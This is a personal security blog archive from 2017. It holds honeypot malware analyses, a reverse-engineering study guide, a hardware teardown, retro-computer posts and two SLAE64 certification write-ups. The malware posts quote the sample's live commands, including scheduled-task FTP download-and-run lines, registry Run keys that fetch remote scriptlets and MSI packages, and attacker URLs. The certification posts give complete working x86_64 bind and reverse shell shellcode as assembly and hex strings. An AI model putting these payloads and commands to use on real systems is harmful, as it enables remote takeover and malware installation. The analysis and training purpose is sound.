Saturday, October 7, 2017

Malware Analysis: CryptoNote Miner? , part 1

Once again I was poking around the binaries that my honeypot collected and I found a really interesting DLL. Mainly because there was no obfuscation at all. This has been a fun one to analyze.

So again, the first thing I noticed was the complete lack of obfuscation. Not even packed with UPX or a simple XOR. 

I uploaded it to Virustotal:


Pretty high detection rate. Looks like it was first uploaded back in May of 2017.

Doing some initial static analysis in IDA, I realized this is just a simple stager. The graph view in IDA really shows how simple it is:


At loc_100029E:


This function seems to be the main purpose of this stager. Notice the offset aVarToff3000Var that gets pushed to the stack. Looks promising!




Well what do you know, looks like some Javascript. Among other things, this Javascript reaches out to few different locations to retrieve some additional crap to dump on your computer.

http://wmi.oo000oo.club:8888/kill.html
http://wmi.oo000oo.club:8888/test.html
http://js.oo000oo.club:280/v.sct (this returned a 404)

So naturally I decided to see if I could get my hands on these. 


So using curl, I found that kill.html seems to be instructions for killing several different processes, a kill switch of sorts. The one I found th most interesting was:

NsCpuCNMiner64.exe c:\windows\debug\wk\NsCpuCNMiner64.exe 0

It doesn't take a whole lot of imagination to figure out what this is. A brief google search lead me to  a github repository:

https://github.com/nanopool/Claymore-XMR-CPU-Miner



So looks like we might have a CryptoNote Miner on our hands! 

Lets try http://wmi.oo000oo.club:8888/test.html



Ok... another URL... Lets try to download it:


A .rar file. I wonder whats inside...



Nothing? But its 1.9 MB. This led me to believe this is not an actual .rar file. So I opened it in CFF explorer to check it out.



Hey! This has the wrong magic number for a .rar file. A .rar should have a magic number of 52 61 72 21 1A 07 00 [Rar!...], this has 4D 5A [MZ] which means this is actually an .exe.

Opening this up in IDA reveals that this file is heavily obfuscated. It will take me a bit to de-obfuscate it. I will get back to this soon.

I decided to keep digging through the original binary to see if I could find anymore hints. I found one more URL:

http://down.oo000oo.club:8888/ok.txt


Looks like some taskkills, registry adds and a few other things:



[down]
http://209.58.186.145:8888/close.bat C:\windows\debug\c.bat 0
[cmd]

net1 start schedule&net1 user asps.xnet /del

net1 user IISUSER_ACCOUNTXX /del&net1 user IUSR_ADMIN /del&net1 user snt0454 /del&taskkill /f /im Logo1_.exe&del c:\windows\Logo1_.exe&taskkill /f /im Update64.exe&del c:\windows\dell\Update64.exe

taskkill /f /im misiai.exe&del misiai.exe&del c:\windows\RichDllt.dll&net1 user asp.net /del&taskkill /f /im winhost.exe&del c:\windows\winhost.exe&del c:\windows\updat.exe

taskkill /f /im netcore.exe&del c:\windows\netcore.exe&taskkill /f /im ygwmgo.exe&del c:\windows\ygwmgo.exe&net1 user aspnet /del&net1 user LOCAL_USER /del

schtasks /create /tn "Mysa" /tr "cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe" /ru "system"  /sc onstart /F

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll" /f

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start1" /d "msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q" /f



Look at that, more URLs. The mykings.top domain seems to be taken down or moved. However, the URL http://209.58.186.145:8888/close.bat works.


Lets see what this batch file has to offer.


Lets see... so it makes some firewall changes and blocks all SMB traffic, shuts down some processes, and adds two scheduled tasks, one of which I found particularly interesting:

schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p" /ru "system"  /sc onstart /F 

This connects to ftp.oo000oo.me and logs in with a username and password of test:1433. Sweet password guys. 



This was also an executable disguised as a .rar and is also heavily obfuscated. The techniques used to obfuscate this one are very similar the 32b executable I downloaded earlier. If I can figure one of these out, the other should be fairly simple. 

In the second part of this write up, I will hopefully de-obfuscate these binaries and get a better idea of what this mess is up to. I'm thinking that one of these binaries is going to be the CryptoNote mining software. I guess we will find out!

EDIT: Turns out that these binaries are protected with VMProtect 3.x. I don't think I will be able to unpack these with my current skill set.

Thursday, October 5, 2017

Wednesday, September 13, 2017

Malware Analysis: ThunderExternal

So recently I set up a dionaea honeypot and I've been catching an insane amount of stuff. I just randomly picked this one to poke at and see what it's up to. I am running Windows 7 x64 in VMware for this analysis.

First off I opened it up in CFF Explorer:


So it seems we have a PE32 file! It is packed with UPX so most likely it wont be too hard to unpack. The original filename is ThunderExternal and appears to be out of China. It says it was created by a company named "ShenZhen Xunlei Networking Technologies,LTD." Which seems to be a legit company: 

http://www.xunlei.com/

It looks like they have a streaming service of sorts called "Thunder". But since this was dumped on my honeypot with no action on my part, I highly doubt this was created by them. This seems to be some sort of adware/fake browser according to some brief googling I did. Now for PEid!


Using PEid, I was able to unpack it with the builtin UPX plugin. However as I found out later, there is further obfuscation. Here are the PEid results after unpacking:


After unpacking I checked the strings output. Here are some strings that I found odd or interesting:

baiduSafeTray.exe   *(Baidu AV process)
BaiduSd.exe
http://users.qzone.qq.com/fcg-bin/cgi_get_portrait.fcg?uins=%s
VIP143785
vsserv.exe               *(Bitdefender process)
set cdaudio door open
set cdaudio door closed wait
Game Over QQ : 4648150
\\.\PHYSICALDRIVE
SYSTEM\CurrentControlSet\Services\%s
Win7
QUHLPSVC.EXE       *(Quick Heal process)

It seems this binary can do all sorts of stuff by the looks of it. There are a ton of different anti-malware process names in this. To me it looks like this might check to see if there is any anti-malware software running. Apparently it can also open and close your cd tray? Maybe at some point it will ask for a disc or something. A lot of the imports are for networking, which makes sense. Looks like it may alter or add a registry entry as well: "SYSTEM\CurrentControlSet\Services\%s"

I used urlscan.io to scan the URL I found:


Looks like an ad for a phone? My first thought was this might be the default landing page for this browser. There is a QR code there as well. I'll dive deeper into this later on.

One thing I found in its resources that I thought was funny was this crappy IE icon ripoff that it uses:


The next thing I want to do is some basic static analysis in IDA. IDA was able to locate the WinMain function, so that was the first thing I looked at.


Looks like this is setting some folder variables:

%ALLUSERSPROFILE%\Application Data\Storm\update\

After following some of these call instructions I noticed a lot of these calls are pointers to hard-coded out of range memory addresses.

This function was interesting to me.


From some brief research I found that winse.exe is not an actual Windows service. The name is very similar to winsec.exe, which is another known malicious executable. Notice the gibberish as well. Has a bit of a repetitive pattern to it. The string "Meumeu Nevne" is referenced many times throughout the code.

There is more obfuscated code in this binary. De-obfuscating is something I need to practice so hopefully this will teach me a lot in the end. The more I think about this, I'm starting to wonder if this targets a specific piece of software or service. Maybe the "Thunder" streaming service?

Wish I could get this to run to do some dynamic analysis on it. As I expected, this raises an exception when I execute it because of the hard-coded out of range memory addresses. I will update this as I continue...

Thursday, September 7, 2017

How to Get Into Reverse Engineering: Where to Start?

One of the biggest hurdles I experienced when getting into reverse engineering was finding an entry point into this seemingly arcane realm of the computer world. It is not an easy subject by any means, nor do I claim to be an expert in any way, but hopefully by writing this blog post I can ease the process of learning about RE.

This is meant to be a high-level guide on how to build a solid foundation for getting into RE. My goal with this post is to provide direction rather than technique, so I will not go in to great detail on each subject. I am going to be focusing x86 and x86_64 on Windows and Linux (mosty Linux), as this is where my experience has come from. I will post a "Further Reading" section at the bottom of this post as well. I want to pack a ton of resources into this and I'm sure I will continually update this as I find new stuff to add.

First off is having strong fundamental knowledge of how computers work, on both the hardware and software level. Make sure you understand how hardware and software work together and how an operating system works. Here are some books/resources that are helpful:

Code: The Hidden Language of Computer Hardware and Software by Charles Petzold

Windows Internals Pt. 1 7th ed.

How Linux Works by Brian Ward

http://www.tldp.org/LDP/tlk/tlk-toc.html

Google

That last one is the most important in the list. Do research! If you don't know something, Google it! Or use Bing if you are a serial killer. But seriously, the best tool in RE is the ability to read. If you ever wonder how something works, look it up. Chances are someone else has had the same question you do, and they may have answered it. If no one else has answered it, maybe you can be the one to provide the answer to everyone else! That's the beauty of the internet.

Learn to program! This is VERY important. I'm not saying "Become a Level 20 C++ wizard!" or anything to that extent, but it is absolutely necessary to understand how programs function. There are more than enough resources out there to learn whatever programming languages you want, but there are a few languages that I highly recommend becoming very familiar with:

  • x86 and x86_64 Assembly (110% necessary)
  • C++
  • Python 

These are by no means the only languages you should become familiar with, but in my opinion I found that these are prevalent enough to be considered necessary. Also, I am personally a terrible programmer. I mostly just write specialized programs for myself when I need to. The idea of developing a large scale program actually sounds pretty terrible to me. But what I do have is the understanding of how a program is written, compiled and eventually, run (Which is what counts right?? ;) ). Here are some programming resources:

https://www.nostarch.com/greatcode.htm <== 2 part series

http://www.learn-c.org/

http://opensecuritytraining.info/IntroX86.html

https://www.learnpython.org/

http://www.learncpp.com/


Learn how executables and binaries work! Learn about ELF binaries, PEs and DLLs! Learn about what the OS does when they run, and what happens in memory at runtime. How can you reverse engineer something if you don't know how it actually works?

Fantastic free course on how binaries work:
http://opensecuritytraining.info/LifeOfBinaries.html

Linux:
http://www.skyfree.org/linux/references/ELF_Format.pdf

https://linux-audit.com/elf-binaries-on-linux-understanding-and-analysis/

https://lwn.net/Articles/631631/

Windows:
https://msdn.microsoft.com/en-us/library/ms809762.aspx

https://support.microsoft.com/en-us/help/815065/what-is-a-dll

https://en.wikibooks.org/wiki/X86_Disassembly/Windows_Executable_Files

These next resources are geared towards the memory management and processing side of things:

What Makes it Page? by Enrico Martignetti

Windows Internals Pt. 1 7th ed. <== Again!

http://www.tldp.org/LDP/tlk/mm/memory.html


So far I have only covered the informational aspect of things and not practical application. This is the area that most people get stuck at when trying to get into RE. I got stuck here big time. Not only is this the hardest part to learn, it is also the hardest part to teach. There is no single right way to reverse engineer. It is a topic that is too vast and there are far too many variables involved to create an effective "all encompassing" book or course. There are tips and tricks people can teach you along the way, but the majority of the heavy lifting will have to be done by you. This is where critical thinking, logical analytic skills and abstract thought come in. The ability to really visualize what is going on and being able to think in an abstract manner is invaluable. Even though the world of computers is very logical, it seems incredibly abstract in contrast to the way our brains are wired. This book will be a huge help and it will teach you C++ as you go:

https://www.nostarch.com/thinklikeaprogrammer

Now that we have the knowledge and hopefully some magic new brain skills, it brings us to our next topic: Tools! There are a plethora of RE tools out there, almost an overwhelming amount to be honest. Which ones should you use? Well, it all depends on what you're doing and what you prefer.

My preference of diassembler and debugger when I am working in Windows is using IDA Pro:

https://www.hex-rays.com/products/ida/

and WinDBG:

https://developer.microsoft.com/en-us/windows/hardware/download-windbg

IDA Pro is an incredibly advanced disassembler. I highly recommend becoming familiar with it. There is an amazing book you can read to do so:

https://www.nostarch.com/idapro2.htm

Not only is it a great book on IDA, it is a great RE book in general. Here is a pretty good intro using the demo version:

http://resources.infosecinstitute.com/basics-of-ida-pro-2/#gref

My preference of diassembler and debugger while working in Linux is is radare2:

http://rada.re/r/

and GDB:

https://www.gnu.org/software/gdb/

Here is a quick intro to GDB:

https://www.cs.cmu.edu/~gilpin/tutorial/

And a full book on radare2:

https://www.gitbook.com/book/radare/radare2book/details

To Be Continued...

Well, I don't know what else to say, so this will be it for now. As I stated earlier, I will continue to add material as I think of it.

Further reading etc:

Practical Malware Analysis

Practical Reverse Engineering

https://github.com/michalmalik/linux-re-101

https://exploit-exercises.com/

The Art of Memory Forensics

https://www.alchemistowl.org/pocorgtfo/

https://github.com/rshipp/awesome-malware-analysis

InfoCon: Hacking Conference Archive

This is amazing. So much information here.

Tuesday, August 15, 2017

Project: Hacking the RecZone Password Safe Part 1


I have mostly concentrated my efforts in learning about reverse engineering software and software exploitation, so I figured I would branch out and try out some hardware hacking. I have no idea if I will be able to accomplish anything in this series of posts, but I am sure I will learn plenty of new things either way.

So the target of this project is the RecZone Password Safe Model 595.


This is a portable password database that seems to be pretty popular, at least on Amazon. I found it at a thrift store for $2.99 and figured it would be a cool project. Being a password bank, I'm going to assume that whoever designed this implemented some extra security measures in its design. Or maybe they didn't! You never know until you look!

Opening the case was simple. Just four screws in the back that hold the case together. The circuit board was held on with 10. The back of the board was simple. There are about a dozen or so small circular contacts placed on the board, which are clearly there for the manufacturer the test continuity and proper voltage levels. Each one has its own label, presumably to show what component it is assigned to. There is also one labeled as GND_ and one labeled as RST.


 
Poking around these contacts with my multimeter caused something to happen that I found interesting. When I put the ground probe on the contact labeled GND_ , and the tested the other contacts for the voltage levels, the piezo buzzer on the board would chirp. Some of the contacts read 3.3v and some hovered around 5v. There is also an IC on the left hand side that I am curious about.

Flipping the board over show the buttons, LCD and a couple COBs (Chip On Board).


Another thing that I found interesting was the way that the display comes in contact with the main board. Its not soldered on to the board, but its held in place with the pressure of the case. Here is a video showing it:


(Edit: After thinking about it, I realized that this might be a security feature. The traces on the board that come in contact with the LCD are looped back to other contacts on the LCD itself. So when you remove the screen, you break several circuits across the board. Plus the fact that the NVRAM and micro controller are underneath the screen kind of adds to my suspicion.)

Yeah yeah I know, I filmed it vertically.

Since there is so little to speak of on this board, the first thing I wanted to check out was that IC on the back of the board. Out came the oscilloscope. To make grounding the probe easier, I soldered a jumper wire to the contact labeled GND_ and grounded the probe to the other end.



For whatever reason, I had a hell of a time soldering the jumper wire to that contact, so please excuse the bad soldering job!

I could not find documentation on the IC. It was really small, but I was able to read the numbers on the top. It also seems to be "Globespan" brand.

25Q401
E49273
AE1128

Here is how I numbered the pins:


I probed the pins with both the scope and multimeter and found that Pin 4 is ground, and Pin 5 and Pin 6 both produce a signal. Pin 6 being significantly more active than Pin 5.

Pin 5:


Pin 6:



Well, that's it for now. In Part 2 I am hoping to capture these signals and try to understand what is happening here. (I just got a logic analyzer, so I will be starting the 2nd portion of this soon)

Monday, August 14, 2017

Online x86 / x64 Assembler and Disassembler

Found this website helpful for reversing shellcode.

https://defuse.ca/online-x86-assembler.htm

From the site:

"This tool takes x86 or x64 assembly instructions and converts them to their binary representation (machine code). It can also go the other way, taking a hexadecimal string of machine code and transforming it into a human-readable representation of the instructions. It uses GCC and objdump behind the scenes."





Thursday, August 10, 2017

Monday, May 15, 2017

Commodore Amiga Haul

So being a massive dork that I am, I couldn't turn down this Commodore Amiga lot that I came across.


Both an Amiga 1000 and a 2000HD! I'm excited about the 2000HD the most. I've wanted one for quite a while. The hard drive works great too. The lot also came with a TON of software. Mostly games and some video software. It came with several versions of Workbench and Kick Start. There is a lot of documentation too, which is handy when you can't find an answer online.

One of the first things I need to do is remove the battery that's next to the CPU on the main board, if it hasn't already been taken off. The batteries that were installed on these are dubbed "Board Killers", since they leak and cause all sorts of corrosion and ruin the components surrounding it.

Both machines work great as-is and I'll be doing some cleaning and preventative maintenance pretty soon, so I will probably post pictures if I find anything interesting.

Monday, May 8, 2017

My Commodore 64 Setup


Here is my Commodore 64 setup, with guest appearance from my Timex Sinclair 1000! I just recently bought the 1701 monitor from a guy in San Jose. Got it for a pretty decent price, considering it came with the box. For some reason I don't have a video cable for hooking up to the chroma input. Somehow I managed to only have composite/AV cables? The two 1541s both work great as well.

I plan on programming a C64 game eventually. It will probably be a Blade Runner-esque adventure game. I picked up a big stack of C64 programming books at a place called Urban Ore in Berkeley CA (I suggest making a trip there if you're in the area) recently, and I have been wanting to start a project.

Sunday, May 7, 2017

Linux x86_64 Bind Shell w/ password

Here is the second assignment for the x86_64 Assembly and Shellcoding Expert (SLAE64) certification. The goal of the assignment was to write a bind shell that requires a password to use. This one was a bit more difficult than the reverse shell in my opinion. The shell itself wasn't too bad, but the whole password thing took me a bit to get right. The shell kept hanging after it executed and wouldn't respond to input. Not exactly sure what was wrong, but it worked after starting from scratch a second time. I'm sure the issue was somewhere in the read() syscall.


global _start
section .text

_start:

 ; sock = socket(AF_INET, SOCK_STREAM, 0)
 ; AF_INET = 2
 ; SOCK_STREAM = 1
 ; syscall number 41 

 xor rax, rax
 mov al, 41
 xor rdi, rdi 
 mov dil, 2
 xor rsi, rsi 
 mov sil, 1
 xor rdx, rdx 
 syscall

 ; copy socket descriptor to rdi for future use 

 mov rdi, rax


 ; server.sin_family = AF_INET 
 ; server.sin_port = htons(PORT)
 ; server.sin_addr.s_addr = INADDR_ANY
 ; bzero(&server.sin_zero, 8)

 xor rax, rax 
 push rax
 mov dword [rsp-4], eax
 mov word [rsp-6], 0x5c11          ; port 4444
 mov byte [rsp-8], 0x2
 sub rsp, 8


 ; bind(sock, (struct sockaddr *)&server, sockaddr_len)
 ; syscall number 49

 xor rax, rax
 mov al, 49
 
 mov rsi, rsp
 xor rdx, rdx 
 mov al, 16
 syscall


 ; listen(sock, MAX_CLIENTS)
 ; syscall number 50
 
 xor rax, rax
 mov al, 50
 xor rsi, rsi 
 mov sil, 2
 syscall


 ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
 ; syscall number 43

 
 xor rax, rax
 mov al, 43
 sub rsp, 16
 mov rsi, rsp
 push 16
 mov rdx, rsp
 syscall

 mov r9, rax                     ; store the client socket description 
 xor rax, rax                    ; close parent      
 mov al, 3
 syscall

 xchg rdi , r9
 xor rsi , rsi

 ; duplicate sockets

dup2:
 push 0x21
 pop rax
 syscall
 inc rsi
 cmp rsi , 0x2
 loopne dup2


Checkpass:
     
 xor rax , rax
 push 0x10
 pop rdx
 sub rsp , 16                 ; 16 bytes to receive user input 
 mov rsi , rsp
 xor edi , edi
 syscall                      ; read()
 mov rax , 0x64726f7773736150 ; "Password"
 lea rdi , [rel rsi]
 scasq
 jz Shell
 push 0x3c
 pop rax
 syscall
 
Shell:

 xor rax, rax                   ; First NULL push
 push rax
 mov rbx, 0x68732f2f6e69622f    ; push /bin//sh in reverse
 push rbx
 mov rdi, rsp                   ; store /bin//sh address in RDI
 push rax                       ; Second NULL push
 mov rdx, rsp                   ; set RDX
 push rdi                       ; Push address of /bin//sh
 mov rsi, rsp                   ; set RSI 

 
 ; Call the Execve syscall

 add rax, 59
 syscall

 

Compile it with nasm

nasm -f elf64 MyBindShell.nasm -o bindshell.o

Looking for nulls in objdump

objdump -d bindshell.o -M intel

bindshell.o:     file format elf64-x86-64

Disassembly of section .text:

0000000000000000 <_start>:
   0:    48 31 c0                 xor    rax,rax
   3:    b0 29                    mov    al,0x29
   5:    48 31 ff                 xor    rdi,rdi
   8:    40 b7 02                 mov    dil,0x2
   b:    48 31 f6                 xor    rsi,rsi
   e:    40 b6 01                 mov    sil,0x1
  11:    48 31 d2                 xor    rdx,rdx
  14:    0f 05                    syscall
  16:    48 89 c7                 mov    rdi,rax
  19:    48 31 c0                 xor    rax,rax
  1c:    50                       push   rax
  1d:    89 44 24 fc              mov    DWORD PTR [rsp-0x4],eax
  21:    66 c7 44 24 fa 11 5c     mov    WORD PTR [rsp-0x6],0x5c11
  28:    c6 44 24 f8 02           mov    BYTE PTR [rsp-0x8],0x2
  2d:    48 83 ec 08              sub    rsp,0x8
  31:    48 31 c0                 xor    rax,rax
  34:    b0 31                    mov    al,0x31
  36:    48 89 e6                 mov    rsi,rsp
  39:    48 31 d2                 xor    rdx,rdx
  3c:    b0 10                    mov    al,0x10
  3e:    0f 05                    syscall
  40:    48 31 c0                 xor    rax,rax
  43:    b0 32                    mov    al,0x32
  45:    48 31 f6                 xor    rsi,rsi
  48:    40 b6 02                 mov    sil,0x2
  4b:    0f 05                    syscall
  4d:    48 31 c0                 xor    rax,rax
  50:    b0 2b                    mov    al,0x2b
  52:    48 83 ec 10              sub    rsp,0x10
  56:    48 89 e6                 mov    rsi,rsp
  59:    6a 10                    push   0x10
  5b:    48 89 e2                 mov    rdx,rsp
  5e:    0f 05                    syscall
  60:    49 89 c1                 mov    r9,rax
  63:    48 31 c0                 xor    rax,rax
  66:    b0 03                    mov    al,0x3
  68:    0f 05                    syscall
  6a:    49 87 f9                 xchg   r9,rdi
  6d:    48 31 f6                 xor    rsi,rsi

0000000000000070 <dup2>:
  70:    6a 21                    push   0x21
  72:    58                       pop    rax
  73:    0f 05                    syscall
  75:    48 ff c6                 inc    rsi
  78:    48 83 fe 02              cmp    rsi,0x2
  7c:    e0 f2                    loopne 70 <dup2>

000000000000007e <Checkpass>:
  7e:    48 31 c0                 xor    rax,rax
  81:    6a 10                    push   0x10
  83:    5a                       pop    rdx
  84:    48 83 ec 10              sub    rsp,0x10
  88:    48 89 e6                 mov    rsi,rsp
  8b:    31 ff                    xor    edi,edi
  8d:    0f 05                    syscall
  8f:    48 b8 50 61 73 73 77     movabs rax,0x64726f7773736150
  96:    6f 72 64
  99:    48 8d 3e                 lea    rdi,[rsi]
  9c:    48 af                    scas   rax,QWORD PTR es:[rdi]
  9e:    74 05                    je     a5 <Shell>
  a0:    6a 3c                    push   0x3c
  a2:    58                       pop    rax
  a3:    0f 05                    syscall

00000000000000a5 <Shell>:
  a5:    48 31 c0                 xor    rax,rax
  a8:    50                       push   rax
  a9:    48 bb 2f 62 69 6e 2f     movabs rbx,0x68732f2f6e69622f
  b0:    2f 73 68
  b3:    53                       push   rbx
  b4:    48 89 e7                 mov    rdi,rsp
  b7:    50                       push   rax
  b8:    48 89 e2                 mov    rdx,rsp
  bb:    57                       push   rdi
  bc:    48 89 e6                 mov    rsi,rsp
  bf:    48 83 c0 3b              add    rax,0x3b
  c3:    0f 05                    syscall

00000000000000c5 <Exit>:
  c5:    6a 3c                    push   0x3c
  c7:    58                       pop    rax
  c8:    48 31 ff                 xor    rdi,rdi
  cb:    0f 05                    syscall

No nulls! Time to pull the hex out of the objdump output.


for i in $(objdump -d bindshell.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo

\x48\x31\xc0\xb0\x29\x48\x31\xff\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x48\x31\xc0\xb0\x31\x48\x89\xe6\x48\x31\xd2\xb0\x10\x0f\x05\x48\x31\xc0\xb0\x32\x48\x31\xf6\x40\xb6\x02\x0f\x05\x48\x31\xc0\xb0\x2b\x48\x83\xec\x10\x48\x89\xe6\x6a\x10\x48\x89\xe2\x0f\x05\x49\x89\xc1\x48\x31\xc0\xb0\x03\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x21\x58\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\xe0\xf2\x48\x31\xc0\x6a\x10\x5a\x48\x83\xec\x10\x48\x89\xe6\x31\xff\x0f\x05\x48\xb8\x50\x61\x73\x73\x77\x6f\x72\x64\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05


Saturday, May 6, 2017

Linux x86_64 Reverse Shell w/ password

So this is my first assignment for the x86_64 Assembly and Shellcoding Expert (SLAE64) certification requirements. The assignment was to create shellcode that will spawn a reverse TCP shell that requires a password. 


global _start


_start:

 ; sock = socket(AF_INET, SOCK_STREAM, 0)
 ; AF_INET = 2
 ; SOCK_STREAM = 1
 ; syscall number 41 

 xor rax, rax
 mov al, 41
 xor rdi, rdi 
 mov dil, 2
 xor rsi, rsi 
 mov sil, 1
 xor rdx, rdx 
 syscall

 ; copy socket descriptor to rdi for future use 

 mov rdi, rax


 ; server.sin_family = AF_INET 
 ; server.sin_port = htons(PORT)
 ; server.sin_addr.s_addr = inet_addr("127.0.0.1")
 ; bzero(&server.sin_zero, 8)

 xor rax, rax 
 push rax
 mov dword [rsp-4], 0x0100007f ; IP address 127.0.0.1
 mov word [rsp-6], 0x5c11 ; port 4444
 mov byte [rsp-8], 0x2
 sub rsp, 8


 ; connect(sock, (struct sockaddr *)&server, sockaddr_len)
 
 xor rax, rax 
 mov al, 42
 mov rsi, rsp
 xor rdx, rdx 
 mov dl, 16
 syscall


        ; duplicate sockets

        ; dup2 (new, old)
        
 xor rax, rax
 mov al, 33
 xor rsi, rsi
 syscall

 xor rax, rax        
 mov al, 33
 xor rsi, rsi        
 mov sil, 1
 syscall

 xor rax, rax
 mov al, 33
 xor rsi, rsi
 mov sil, 2
 syscall


 password_check:
     
 push rsp
 pop rsi
 xor rax, rax      ; system read syscall value is 0 so rax is set to 0
 syscall
 push 0x73736170  ;password 'pass'
 pop rax
 lea rdi, [rel rsi]
 scasd             ; comparing the user input and stored password in the stack
 jne Exit      

 ; execve

 ; First NULL push

 xor rax, rax
 push rax
 mov rbx, 0x68732f2f6e69622f     ; push /bin//sh in reverse
 push rbx
 mov rdi, rsp     ; store /bin//sh address in RDI
 push rax    ; Second NULL push
 mov rdx, rsp   ; set RDX
 push rdi   ; Push address of /bin//sh
 mov rsi, rsp   ; set RSI

        ; Call the Execve syscall
 add rax, 59
 syscall

 Exit:
  ;Exit shellcode if password is wrong
  
 push 0x3c
 pop rax           ;syscall number for exit is 60
 xor rdi, rdi
 syscall
 

So now that I have the my shell written, I need to compile it.

nasm -f elf64 RevShellpass.nasm -o Revshellpass.o

Now to run objdump to see if there are any nulls.

objdump -d RevShellpass.o -M intel

The output shows there are no nulls, save the nulls inherent in the IP address 127.0.0.1 that I used for testing purposes. (highlighted in yellow)

RevShellpass.o:     file format elf64-x86-64


Disassembly of section .text:

0000000000000000 <_start>:
   0:    48 31 c0                 xor    rax,rax
   3:    b0 29                    mov    al,0x29
   5:    48 31 ff                 xor    rdi,rdi
   8:    40 b7 02                 mov    dil,0x2
   b:    48 31 f6                 xor    rsi,rsi
   e:    40 b6 01                 mov    sil,0x1
  11:    48 31 d2                 xor    rdx,rdx
  14:    0f 05                    syscall
  16:    48 89 c7                 mov    rdi,rax
  19:    48 31 c0                 xor    rax,rax
  1c:    50                       push   rax
  1d:    c7 44 24 fc 7f 00 00     mov    DWORD PTR [rsp-0x4],0x100007f
  24:    01
  25:    66 c7 44 24 fa 11 5c     mov    WORD PTR [rsp-0x6],0x5c11
  2c:    c6 44 24 f8 02           mov    BYTE PTR [rsp-0x8],0x2
  31:    48 83 ec 08              sub    rsp,0x8
  35:    48 31 c0                 xor    rax,rax
  38:    b0 2a                    mov    al,0x2a
  3a:    48 89 e6                 mov    rsi,rsp
  3d:    48 31 d2                 xor    rdx,rdx
  40:    b2 10                    mov    dl,0x10
  42:    0f 05                    syscall
  44:    48 31 c0                 xor    rax,rax
  47:    b0 21                    mov    al,0x21
  49:    48 31 f6                 xor    rsi,rsi
  4c:    0f 05                    syscall
  4e:    48 31 c0                 xor    rax,rax
  51:    b0 21                    mov    al,0x21
  53:    48 31 f6                 xor    rsi,rsi
  56:    40 b6 01                 mov    sil,0x1
  59:    0f 05                    syscall
  5b:    48 31 c0                 xor    rax,rax
  5e:    b0 21                    mov    al,0x21
  60:    48 31 f6                 xor    rsi,rsi
  63:    40 b6 02                 mov    sil,0x2
  66:    0f 05                    syscall

0000000000000068 <password_check>:
  68:    54                       push   rsp
  69:    5e                       pop    rsi
  6a:    48 31 c0                 xor    rax,rax
  6d:    0f 05                    syscall
  6f:    68 70 61 73 73           push   0x73736170
  74:    58                       pop    rax
  75:    48 8d 3e                 lea    rdi,[rsi]
  78:    af                       scas   eax,DWORD PTR es:[rdi]
  79:    75 20                    jne    9b <Exit>
  7b:    48 31 c0                 xor    rax,rax
  7e:    50                       push   rax
  7f:    48 bb 2f 62 69 6e 2f     movabs rbx,0x68732f2f6e69622f
  86:    2f 73 68
  89:    53                       push   rbx
  8a:    48 89 e7                 mov    rdi,rsp
  8d:    50                       push   rax
  8e:    48 89 e2                 mov    rdx,rsp
  91:    57                       push   rdi
  92:    48 89 e6                 mov    rsi,rsp
  95:    48 83 c0 3b              add    rax,0x3b
  99:    0f 05                    syscall

000000000000009b <Exit>:
  9b:    6a 3c                    push   0x3c
  9d:    58                       pop    rax
  9e:    48 31 ff                 xor    rdi,rdi
  a1:    0f 05                    syscall

Now that there are no nulls in the shellcode, time to pull the hex out of the objdump output.

for i in $(objdump -d RevShellpass.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo

\x48\x31\xc0\xb0\x29\x48\x31\xff\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\xc7\x44\x24\xfc\x7f\x00\x00\x01\x66\xc7\x44\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x48\x31\xc0\xb0\x2a\x48\x89\xe6\x48\x31\xd2\xb2\x10\x0f\x05\x48\x31\xc0\xb0\x21\x48\x31\xf6\x0f\x05\x48\x31\xc0\xb0\x21\x48\x31\xf6\x40\xb6\x01\x0f\x05\x48\x31\xc0\xb0\x21\x48\x31\xf6\x40\xb6\x02\x0f\x05\x54\x5e\x48\x31\xc0\x0f\x05\x68\x70\x61\x73\x73\x58\x48\x8d\x3e\xaf\x75\x20\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05

Linking it with ld to test it as a standalone binary

ld RevShellpass.o -o RevShellpass